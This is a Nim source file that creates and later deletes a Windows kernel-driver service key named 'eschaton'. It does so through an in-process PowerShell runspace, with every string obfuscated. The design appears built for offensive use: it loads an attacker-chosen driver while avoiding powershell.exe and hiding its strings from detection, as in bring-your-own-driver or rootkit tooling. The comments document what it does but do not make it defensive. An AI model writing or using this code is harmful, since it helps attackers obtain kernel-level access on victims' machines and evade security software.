import winim/clr, sugar
import obf
proc exec_power*(driver_path : string, driver_file : string) =
  ## Registers a service named "eschaton" by writing a key and two values
  ## under HKLM\System\CurrentControlSet\Services, using a PowerShell
  ## runspace hosted in this process (System.Management.Automation is
  ## loaded through winim/clr rather than by running a powershell.exe).
  ##
  ## driver_path, driver_file: concatenated verbatim -- no path separator
  ## is inserted -- to form the ImagePath value the service points at.
  ##
  ## The Invoke() result is discarded, so nothing in this proc checks
  ## whether the cmdlets succeeded. Every literal is wrapped in `obf` from
  ## the imported obf module; its exact transformation is not visible here.
  var
    # CLR assembly and the RunspaceFactory type resolved from it.
    Automation = load(obf("System.Management.Automation"))
    RunspaceFactory = Automation.GetType(obf("System.Management.Automation.Runspaces.RunspaceFactory"))
    # `@` is winim/clr's prefix for static-member access on a CLR type;
    # CreateRunspace() is RunspaceFactory's static factory -- confirm
    # against the winim/clr documentation.
    runspace = @RunspaceFactory.CreateRunspace()
    path = driver_path & driver_file
    # Key creation, then ImagePath (the driver binary) and Type
    # (1 == SERVICE_KERNEL_DRIVER). No Start value is written here.
    cmd1 = obf("New-Item -Path HKLM:\\System\\CurrentControlSet\\Services\\ -Name \"eschaton\"")
    cmd2 = obf("New-ItemProperty -Path HKLM:\\System\\CurrentControlSet\\Services\\eschaton -Name \"ImagePath\" -Value \"") & path & obf("\" -PropertyType \"String\" ")
    cmd3 = obf("New-ItemProperty -Path HKLM:\\System\\CurrentControlSet\\Services\\eschaton -Name \"Type\" -Value 1")
  # sugar.dump: debug macro that prints `path = <value>` to stdout.
  dump path
  echo obf("[+] writing driver registry")
  runspace.Open()
  var pipeline = runspace.CreatePipeline()
  # Three separate scripts on one pipeline, run in order by Invoke().
  pipeline.Commands.AddScript(cmd1)
  pipeline.Commands.AddScript(cmd2)
  pipeline.Commands.AddScript(cmd3)
  # Output objects and any error records are thrown away.
  discard pipeline.Invoke()
  runspace.Close()
proc cleanup_power*() =
  ## Deletes the "eschaton" service key that exec_power creates, again via
  ## an in-process PowerShell runspace (same CLR loading sequence).
  ##
  ## The Invoke() result is discarded, so a failed Remove-Item is not
  ## detected and the success message at the end is printed regardless.
  var
    # CLR assembly and RunspaceFactory type, resolved as in exec_power.
    Automation = load(obf("System.Management.Automation"))
    RunspaceFactory = Automation.GetType(obf("System.Management.Automation.Runspaces.RunspaceFactory"))
    # `@`: winim/clr static-member access -- confirm against its docs.
    runspace = @RunspaceFactory.CreateRunspace()
    cmd1 = obf("Remove-Item -Path HKLM:\\System\\CurrentControlSet\\Services\\eschaton")
  runspace.Open()
  var pipeline = runspace.CreatePipeline()
  pipeline.Commands.AddScript(cmd1)
  # Output and error records are not inspected.
  discard pipeline.Invoke()
  runspace.Close()
  # Printed unconditionally; does not reflect whether the key was removed.
  echo obf("[+] driver registry cleaned")